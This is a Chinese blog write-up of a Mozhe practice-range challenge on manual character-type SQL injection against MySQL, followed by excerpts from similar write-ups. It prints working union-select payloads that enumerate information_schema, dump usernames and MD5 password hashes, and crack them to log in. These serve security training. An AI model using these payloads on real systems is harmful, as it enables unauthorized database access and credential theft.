墨者-SQL手工注入漏洞测试(MySQL数据库-字符型)题解

最新推荐文章于 2025-08-02 16:58:52 发布
原创 最新推荐文章于 2025-08-02 16:58:52 发布 · 675 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql #web安全

本文详述了一次SQL注入攻击的过程,从发现登录页面的注入点,到利用注入漏洞获取数据库信息,包括数据库版本、库名、表名、字段名及数据。最终通过解密密码字段,成功登录并获取关键信息。

靶场地址:https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe

题解:
①启动靶场,url:http://219.153.49.228:43157/,是一个登录界面,显然需要登录获得key,一开始使用万能密码、抓包都没找到注入点,结果在这个滚动的公告页面,url:http://219.153.49.228:43157/new_list.php?id=tingjigonggao
在这里插入图片描述
②进入页面,url中有id=tingjigonggao,显示是get的字符型参数
试一下id=tingjigonggao',报错
在这里插入图片描述
试一下id=tingjigonggao' and '1'='1' -- q,页面正常
在这里插入图片描述
试一下id=tingjigonggao' and '1'='2' -- q,页面不正常
在这里插入图片描述
判断存在字符型注入。

③判断字段数
id=aaa' order by 5 -- q,报错
id=aaa' order by 4 -- q,没数据,正常
判断字段数为4。

④判断回显点

id=aaa' union select 1,2,3,4 -- q
在这里插入图片描述
2,3参数处回显。

⑤参数替换version()查看版本

id=aaa' union select 1,2,version(),4 -- q
在这里插入图片描述
MariaDB-10.2.15>mysql5.0,放心用information_schema库。

⑥查询所有库名

id=aaa' union select 1,2,group_concat(schema_name),4 from information_schema.schemata -- q
在这里插入图片描述
获得库名information_schema,mozhe_discuz_stormgroup,mysql,performance_schema,test

⑦查询mozhe_discuz_stormgroup库中的表
id=aaa' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema='mozhe_discuz_stormgroup' -- q
获得表名notice,stormgroup_member
在这里插入图片描述
⑧查询stormgroup_member表中字段名
id=aaa' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='stormgroup_member' -- q
获得字段名id,name,password,status
在这里插入图片描述
⑨查询字段值
id=aaa' union select 1,2,group_concat(name,0x7c,password),4 from stormgroup_member -- q
获取用户名和MD5加密的password
mozhe|356f589a7df439f6f744ff19bb8092c0,mozhe|57673e9e6b26829ba7a4b4d43e8ae8a7
somd5解密得到两个密码dsan13,891185,后面一个是对的,离谱。。。
登录获取key。
在这里插入图片描述

SQL手工注入漏洞测试(MySQL数据库-字符型)
kugaigao_的博客
12-10 496
启动靶场 点击‘关于平台停机维护的通知’ 在id后加’%23 判断是否存在注入点,加’ and 1=1%23,存在注入点。 ’ order by 5%23 ’ order by 4%23,有四个字段。 id=1’ and 1=2 union select 1,2,3,4%23 id=1’ and 1=2 union select 1,database(),version(),4%23 id=1’ ...
墨者靶场---1、SQL手工注入漏洞测试
qq_43168364的博客
08-21 338
实训目标 掌握SQL注入原理; 了解手工注入的方法; 了解MySQL的数据结构; 了解字符串的MD5加解密; sql注入的流程 1、判断注入点 2、判断注入类型,是字符型还是数字型 3、判断字段数 4、判断显示位 5、得库名 6、得表名 7、得列名 8、得数据 盲注和报错注入可能不太会用到上面的步骤,但是大致思想都是相同的。 注入步骤 起初以为是在登录窗口进行的POST注入,试了很多次没有成功,后来发现下面还有一个页面 在这里找到了它的注入点在URL中 接下来判断注入类型(这里and应该是被
[SQL 注入] 墨者靶场 SQL手工注入漏洞测试(MySQL数据库-字符型)
Tiantangbujimo7的博客
01-04 994
SQL注入学习初次尝试SQL注入SQLmap一把梭 查找sql注入漏洞位置 发现红框地方有SQL 注入漏洞 初次尝试SQL注入 开整 其实是为了测试 1’and 1=1# '; http://靶场IP:端口/new_list.php?id=tingjigonggao%201%27and%201=1#%20' 看到这边我直接懵逼了,为什么加上 '# 过滤都不可以了,查阅资料后发现还有其它注释样式: #、 --+、 --%20、 %23 1.开始漏洞检测: http://靶场IP:端口/new_li
墨者题解_SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_43072923的博客
04-03 361
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)题解 首先我们根据背景介绍可知: PHP代码未对用户提交的参数进行过滤,我们便可以试试SQL漏洞(虽然题目已经说明是字符型SQL注入漏洞) 打开靶机,我们发现密码栏下面的公告可以点击,发现公告网页的URL有可疑的注入点,开始进行尝试: 第一步: 我们对 id=tingjigonggao 后面输入一个单引号 " ’ " ,发现网页返回错误,判断出存在字符型注入漏洞; 第二步: 使用order by 语句来判断列数: id=tingji
墨者学院在线靶场WP
心想事成
12-22 1090
我们知道 HTTP 连接基于 TCP 连接,HTTP 协议中没有 IP 的概念,Remote Address 来自 TCP 连接,表示与服务端建立 TCP 连接的设备 IP,在这个例子里就是 IP3。Remote Address 无法伪造,因为建立 TCP 连接需要三次握手,如果伪造了源 IP,无法建立 TCP 连接,更不会有后面的 HTTP 请求。可以看到,XFF 的内容由「英文逗号 + 空格」隔开的多个部分组成,最开始的是离服务端最远的设备 IP,然后是每一级代理设备的 IP。
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 4166
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入字符型SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
墨者学院 SQL手工注入漏洞测试(MySQL数据库)
qq_48368964的博客
07-22 577
id=1 order by 5 回显异常,说明有四列字段。id=1 order by 1 回显正常。由于为root用户,所以可以高权限访问其他的数据库信息,可跨库查询信息,同一个服务器下的不同站点中的数据库均可查看。接下来进行信息收集,收集数据库的信息:操作系统,数据库名,数据库的用户,数据库的版本等。直接在可控变量后面随便输入值,看回显效果,回显不正常,可能存在SQL注入。观察url信息,为GET请求,存在可控变量,验证是否存在SQL注入。1 and 1=2 回显不正常,可能存在SQL注入
墨者学院SQL手工注入漏洞测试(MySQL数据库-字符型)
最新发布
2303_81096390的博客
08-02 695
进入靶场环境,点击登录框下面的那一串流动的字符进入具体的注入点页面查看url,发现有可变的参数?id=,此处为字符型注入sql注入分为字符型注入和数字型注入,两者有什么区别呢,简单来说就是字符型注入需要闭合,而数字型注入不需要闭合具体解释:为什么字符型需要闭合,数字型不需要?
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)
Lollipop_zhi的博客
02-26 2419
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
墨者学院】SQL手工注入漏洞测试(MySQL数据库)
muyuchen110的博客
07-22 615
安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
墨者-mysql过滤字符后手工注入漏洞测试 题解
Redredredfish的博客
12-16 2000
靶场地址 第一题:https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe 第二题:https://www.mozhe.cn/bug/detail/RkxnbzB6WWpWWjBuTDEyamZXNmJiQT09bW96aGUmozhe 第三题: https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe 题解 第一题
渗透测试中新手必练的15个靶场
Lucker_YYY的博客
10-02 1653
相信很多小伙伴们在学习渗透测试的时候,不知道如何开始,那么这下面15个靶场对你的学习将会有很大的帮助!SFeather::CTF明早8点开始,快来签到吧。赛点:ctf.54cto.com。
墨者靶场(综合)
曹振国的博客
06-20 2371
初级 综合表单暴力破解实训(第1题)提示:直接使用BurpSuite抓包跑数字HTML前端代码分析(暗链)提示:打开页面:访问得到key值:SVN信息泄露漏洞分析(第1题)背景介绍提示:1.使用dirsearch扫描地址2.使用Navicat Premium打开备份文件3.访问地址得到key值WEB页面源代码查看提示:F12看的key值 表单暴力破解实训(第1题) 提示: 直接使用BurpSuite抓包跑数字 成功拿到key HTML前端代码分析(暗链) 提示: 打开页面: 查看源码发现有一
墨者学院_CMS系统漏洞分析溯源(第4题)
weixin_50698958的博客
10-10 969
靶场: https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe 背景介绍 ASPCMS是完全开源的一套CMS建站系统,主要面向企业进行快速的建造简洁,高效,易用,安全的公司企业网站,一般的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异的公司企业网站。ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 实训目标 1.学习登录绕过
SQL手工注入漏洞测试—Access数据库墨者学院靶场
ISNS的博客
07-09 1601
靶场: https://www.mozhe.cn/bug/detail/VExmTm05OHhVM1dBeGdYdmhtbng5UT09bW96aGUmozhe 1.点击滚动的通知。 点击后进入页面: 2.判断是否为注入点。 3.判断字段数量。 采用二分法,从10开始查询。结果显示有4个字段: 因为Access用联合语句显示可显字段时,必须要“from 表名”,所以需要先猜表名。 4.猜...
sql注入-墨者学院SQL手工注入漏洞测试(MySQL数据库)
m0_75178803的博客
04-15 1162
猜解列名字段数(数量) order by x 错误与正常的正常值的的连接点。union select 1,2,3,4 页面正常。回到题目上来,我们在id=1后面随意输入一些东西。order by 4,页面正常。order by 1,网站正常。order by 5,页面错误。文章基于小迪sql注入的复现。页面错误,说明id为注入点。我们即可得知有4个字段数。and 1=1 页面正常。and 1=2 页面错误。
墨者学院-XWAY科技管理系统V3.0
lianliandad的博客
09-15 4489
妙啊
墨者学院SQL手工注入靶场漏洞详解
sone_yoonyul的博客
07-07 1652
墨者学院SQL手工注入靶场漏洞详解目录靶场地址步骤详解 目录 靶场地址 该靶场墨者学院安全工程师“墨者”所搭建,靶场环境为Nginx+PHP+MySQL,启动靶场只需1币(注册的时候会送十几个币并且不会重复消耗,只需要尽情练习即可),靶场地址: https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe 步骤详解 观察首页,是否有注入入口 表单处无法进行注入,这时可以发现滚动栏有个通知,点开之后发现这是一
墨者SQL手工注入漏洞测试(MySQL数据库)思路
weixin_50847719的博客
01-22 671
师从小迪,刚看完sql注入,印象最深刻就是小迪师傅到第四天了打火机依旧没油,咔嚓咔嚓打不着火 进入 寻找注入点 看这 http://219.153.49.228:47589/new_list.php?id=1 判断注入,老办法and 1 = 1和and 1=2 http://219.153.49.228:47589/new_list.php?id=1%20and%201=2 下面该数据库有几个字段(列名数量) order by x id=1 order by x http://219.153.
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Redredredfish

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值